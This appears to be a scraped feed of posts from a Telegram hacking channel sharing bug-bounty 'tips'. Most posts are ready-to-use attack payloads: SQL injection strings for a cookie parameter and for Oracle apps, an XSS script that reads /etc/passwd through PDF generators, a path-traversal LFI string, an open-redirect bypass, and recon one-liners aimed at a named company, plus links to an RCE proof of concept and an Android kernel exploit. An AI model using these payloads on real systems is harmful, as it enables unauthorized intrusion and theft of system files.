Found SQL Injection in [org_id] Cookie
Payloads for Testing:
Injected in request like this
#BugBounty #Tips #SQL
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE-1 OR 6=6 AND 0-0=> TRUEInjected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0#BugBounty #Tips #SQL
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7❤2🔥1💯1
#Notification #Warning
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7⚡2❤2🔥1💯1
This is very cool. Get cheatsheets in your terminal with a curl command!
⌨️ Try this:
#Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
curl https://cht.sh/sqlmap#Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6⚡2❤1🔥1💯1
LearnExploit#Osint #Telegram #Discord
Please open Telegram to view this post
VIEW IN TELEGRAM
✍5⚡3👍2❤1🔥1💯1
If you discover an oracle web app, you can use this payload
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
EHY01%27OR+1%3d1+AND+NVL(ASCII(SUBSTR((SELECT+chr(78)%7c%7cchr(69)%7c%7cchr(84)%7c%7cchr(83)%7c%7cchr(80) )%7c%7cchr(65)%7c%7cchr(82)%7c%7cchr(75)%7c%7cchr(69)%7c%7cchr(82)+FROM+DUAL)%2c9%2c1))%2c0) %3d82--#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
❤4👍2⚡1🔥1
NoMore403
Introduction:
Prerequisites:
Before you install and run
Installation:
Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
Usage:
Github
⬇️ Download
#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Introduction:
nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.Prerequisites:
Before you install and run
nomore403, make sure you have the following:Go 1.15 or higher installed on your machineInstallation:
cd nomore403
go get
go build
Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
Usage:
./nomore403 -h
Github
⬇️ Download
🔒 LearnExploit#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡7👍4
One line for subdomain
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
$(subfinder -d http://tesla.com| dnsx |httpx); do katana -u "$subdomain" -d 5 -jc -jsl -aff -kf all -mrs 5242880 -timeout 15 -retry 3 -s breadth-first -iqp -cs "$subdomain" -f url -sf url -rl 200 -p 20 -dr -nc -H -silent -fdc 'status_code == 404' ;done#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
⚡7👎3👍2❤1
XSS to Exfiltrate Data from PDFs 🔥🥵
#xss
——————
0Day.Today
@LearnExploit
@Tech_Army
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>#xss
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5👍5👎1
Quick and amazing LFI
#Lfi
——————
0Day.Today
@LearnExploit
@Tech_Army
filePath=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts#Lfi
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡7👎3👍1
Automating SSRF using Autorepeater
In the window of Auto-Repeater, we can specify some regex to find urls.
#SSRF
——————
0Day.Today
@LearnExploit
@Tech_Army
In the window of Auto-Repeater, we can specify some regex to find urls.
https?:\/\/(www\.)?[-a-zA-Z0–9@:%._\+~#=]{1,256}\.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%_\+.~#?&//=]*)#SSRF
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4👍1
❤4❤🔥1
A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)
Github
#RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
❤5👍1
A kernel exploit for Pixel7/8 Pro with Android 14
Github
#Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - 0x36/Pixel_GPU_Exploit: Android 14 kernel exploit for Pixel7/8 Pro
Android 14 kernel exploit for Pixel7/8 Pro. Contribute to 0x36/Pixel_GPU_Exploit development by creating an account on GitHub.
👍3⚡2🔥2
Bypass open redirection whitelisted using chinese dots:
Tip: Keep eyes on SSO redirects
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
%E3%80%82Tip: Keep eyes on SSO redirects
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤6
Defcon Media Server - This is an "index of /" with files from the Defcon Archive.
Link
#onion #Darkweb
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#onion #Darkweb
——————
0Day.Today
@LearnExploit
@Tech_Army
❤5👍3🤝1
❤🔥8🫡2👍1
┌──(LearnExploit㉿kali)-[~]
└─$ sudo rm -rf 1402
┌──(LearnExploit㉿kali)-[~]
└─$ sudo mkdir 1403
iliyahr , AT7 , R4DiKaLL , X0P4Sh4 , А.Хоссейни——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥13👍2💯1